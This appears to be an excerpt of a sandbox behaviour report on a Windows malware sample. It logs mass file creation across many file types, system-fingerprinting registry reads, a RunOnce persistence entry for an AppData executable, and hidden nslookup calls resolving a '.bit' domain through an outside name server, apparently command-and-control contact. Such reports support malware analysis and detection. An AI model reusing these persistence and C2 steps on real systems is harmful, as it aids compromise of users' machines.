Create Z:\j22nZgN.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\Q55M7RMlQ1.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\wMw0OlwWKG.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\kmaCVAfM6c.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\p1AcZbp.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\tMBfWUGp.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Vtrqfx.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\6swVov0.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uGfnva.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\f9u0K1jcf0QP3CTM.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\q6bC91bzrR.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\mnb7We8LDQ6wrfuL.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\VS9DW.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aXQim1G3bdkTaexwp.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\caihllUFFbcI.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\STk5oD5FdXN.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\9C7SUj.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\lEmsyCR.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\y0T1Oh7jZZrC632.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\TdlMonCmeQCgkgR.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Er77NKOfBV.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rufq1skQBAfqcl.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\5Z53F1qndo.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\MSGyIwhbxwdO.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\U9PpB.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SqQA6.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bizZxIqHANu2cm8BJxR8.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rTl3TzrdncuxVDUwQq.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\mn3To5BSC6.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kxq03SULHIq.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JRxsV.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qai0Z93lFXyA0a.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XVkMbKypLIiLe059.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\np5Lm.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\P1jVB9gi5QH3vMspsV.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\AJTRrzlFP.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\CDcBqXoR8.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\u83WZ8EHqHRLwl.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\rLuJ2.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\U3bDAfX7RABVK6AIAEZ.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\cdUeFalzm2mB.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tC427X.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\4GjkdoqNU7goI.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\0nDSOdqmLj8q.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\IbgNETou.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uPbNb139dTSMCdhFwG.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ySIriF.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SlLKD2xxbJU8.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\f3n4Cqr.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\PW0S4nrI2WlYOAIrz.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\4gn85VfichSpHdBliF7.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aVTaxRUSrZtHvgszoz.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\xQkZa3z95fozLz9l.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\aXUpRcAz27mPKX.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SDaBMuPeRu.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\0UnRrqmweUZEv2O.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\xEUQNFb1AtDa2EwjJi3V.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\qaJqcQYga.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bCtdCwG6b1aq.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\e9iHCx5Vx23avMo.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\LezTzJpVLGFgKhSzkk.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\drKebb7BNUgYcBRuo.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Or93WHIBFD2VZ2c.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\nyYkSXYcJ3N.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Ogn94.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JGRRP.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\FnlnIo8c7yqjr.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\JB0dwuDHOu.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\vspqQ0o2tOKgZZ.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kpsjXydZA9PotWH4.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\jLzvb0vT3n52cwbHU6Y.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\dXDD6Vxqyd8jeu.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\reR9RHCDTohDYK3Ff2Y.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\GafAVMmaQERttbRLW.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\n9qfkqWXJ24VCxo.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Zz3XIk0KMIqhIY4WEe.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tCssBJQX8FXIL.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\k45e5zDG7.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\kjDb0JPxXV.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\jOJaIjFheEW0T.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\iR5AlC5ioa.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\byOgrXTqMWyQA.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\cutoBa.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\uaDwX5CMU5U3ucB.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\IKsof.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\LBzJZ0Sa2cEQ2n6qcw3.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\a7Qw6I.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ij5BP3IVD95.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\4wTKrcVkUP.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BCcVJ1ufkJ.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XB4dDmeUIpvrtaFxi.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\7GrhyEMiwBBm2mof.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\iYqEjip6ZD7yL0q2o40t.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\klftX5pih07o.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\B1jyWDTc76Rz9y3Upp.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\oxutnkIjKB.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\tHwCdQmMoSd.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\VI1xj.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\AEAoxD1Men.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SmlQzbt58YRNZL1.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BKUsAPb4ObOA3nffiu.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\zg8vtsMD.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\St0RmHrDVByM7p25RVJ.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\QeR6tf3.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\5X5bvQKCD.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\dHIr0PyqgW0.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\XMjApX5V6.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SPmVqqj8wFtWH.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\KLpg3Rdw1l.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Vi3sQD.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Keq3DmENGzTu.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\lfR9rINk9dEZ.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\SkCFLGl.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\HkvYL3k.odt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\Tdjnpl4mS5gutb0FZJX9.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\bagG03Siv8fZOaNznAH.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\p87Mkvx4n6eR91T.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\cUJr74E.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\5nMxkl.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\X2ZrVB60bDAK3cZl14f.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\CEkSQb1l9V40Cea.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ib3F5TJ.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\KFk2iz2CjAH.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\ZfiqBIWgc6yC8hqpAMBh.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\BSTdcQ8gXiWpbdQJ9j9.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Z:\j1HIB7qSx.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Create Pipe Anonymous read pipe size = 0 True 1
Create Pipe Anonymous read pipe size = 0 True 1
Create Pipe Anonymous read pipe size = 0 True 1
Get Info C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe type = size True 1
For performance reasons, the remaining 2015 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (34)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = duyccbpmaea, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ True 1
Process (2)
Operation Process Additional Information Success Count Logfile
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xdc4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xee4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Module (2748)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x74120000 True 3
Fn
Load KERNEL32.dll base_address = 0x74120000 True 2
Fn
Load msvcr100.dll base_address = 0x6f970000 True 1
Fn
Load USER32.dll base_address = 0x76840000 True 1
Fn
Load GDI32.dll base_address = 0x764e0000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76dc0000 True 1
Fn
Load SHELL32.dll base_address = 0x750e0000 True 1
Fn
Load CRYPT32.dll base_address = 0x74c50000 True 1
Fn
Load WININET.dll base_address = 0x6fdc0000 True 1
Fn
Load PSAPI.DLL base_address = 0x74560000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74120000 True 12
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x76e90000 True 7
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76dc0000 True 1232
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7413a980 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74137570 True 2
Fn
